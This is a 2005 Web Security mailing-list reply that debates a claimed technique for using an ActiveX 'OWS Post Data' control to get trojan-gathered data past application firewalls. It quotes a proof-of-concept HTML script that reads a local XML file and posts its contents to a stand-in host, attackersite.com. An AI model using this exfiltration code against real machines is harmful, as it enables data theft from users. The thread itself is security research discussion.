[WEB SECURITY] RE: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data

Gaurav Kumar gaurav at securebox.org
Wed Dec 21 22:21:59 EST 2005

On 12/22/05, Debasis Mohanty <mail at hackingspirits.com> wrote:
> -----Original Message-----
> From: Gaurav Kumar
> Sent: Wednesday, December 21, 2005 8:59 PM
> To: full-disclosure at lists.grok.org.uk
> Cc: websecurity at webappsec.org
> Subject: [Full-disclosure] new attack technique? using
> JavaScript+XML+OWSPost Data
> 1>> A Trojan has been to be placed in a system running an
> 1>> application firewall like Zone Alarm Pro etc.
> >> Assumptions:
> 2>> The target system must be having office XP and the user has
> 2>> to be lured to view a webpage hosted by attacker.
> 3>> The Trojan can be designed to generate an xml
> 3>> file which will contain the data to be sent out. The attacker will lure
> the
> 3>> user to visit a website hosted by him.
> Lol !! In a practical scenario, the attacker who spreads the worm/trojans
> himself is not aware in the initial stage which are the infected machines
> unless the trojan sends back the machine/user info back to the attacker. Now
> as you have already mentioned ZA is running then no data can be sent back to
> the attacker. So the attacker is clueless which are those infected machines.

Looks like u need to read again what i wrote. I didnt use the word
'spread'. Moreover, u need not know if the target system is running ZA
or not...the technique works even if firewall
is not installed. I am discussing a possible 'design' of a trojan
here, doesnt matter is ZA or any other FW is running on client.

> So the case of luring the user to visit the link is out of scope...

really? ever heard of IE exploits?

> >> The site can have following HTML code-
> Now coming back to technical stuff, You are trying to access a local file
> which will only be allowed if the site is in "Trusted Sites" or "Local
> Intranet" or "Local Security Zone" and activex not marked safe. The fact
> that *the client is also the server* is irrelevant.
> Try uploading the script to some webserver and give a html extention; it
> will throw an _access denied_ error when the page loads (even on Win XP +
> SP1).
> In case of any server side extention like *.asp, *.jsp etc, the user will be
> prompted that an malicious component is trying to load and ask for user
> permission.
> >> <html>
> >> <body>
> >> The author is not responsible for any misuse,
> >> this PoC is for educational purpose only.
> >> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> >> id="exp">
> >> </object>
> >> <script LANGUAGE=javascript>
> >> var xmlDoc
> >> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> >> xmlDoc.async=false;
> >> xmlDoc.load("c:\\note.xml");
> >> xmlObj=xmlDoc.documentElement;
> >> var a= xmlObj.firstChild.text;
> >> exp.Post(0,"http://www.attackersite.com/input.asp",a);
> >> </script>
> >> </body>
> >> </html>
> >> The above code (works well on windows XP SP2) essentials calls
> >> "OWS Post Data" COM control to post the contents of note.xml
> >> (generated by trojan) to attackersite.com
> IMHO, never conduct such tests in a "Intranet Zone" or "Local Zone" and draw
> conclusion about "Internet Security Zone".
> You may also link to know about this issue -
> http://support.microsoft.com/kb/317244/EN-US/
> >>> Essentially, the technique is breaking the basic
> >>> functionality of application firewalls by using OWS Post Data
> >>> as bridge for sending out the data using Javascript and XML.
> Not Exactly !! I wud rather suggest you to do a little more research and
> draw any conclusion. Keep those _Security Zones_ in mind before you post
> anything...

Well..Exactly! i would suggest u read the 'assumptions' first, its an
assumption that user will click yes to warning...like most 'normal'
users do.
> - D
> ---------------------------------------------------------------------
> The Web Security Mailing List
> http://www.webappsec.org/lists/websecurity/
> The Web Security Mailing List Archives
> http://www.webappsec.org/lists/websecurity/archive/

The Web Security Mailing List

The Web Security Mailing List Archives

More information about the websecurity mailing list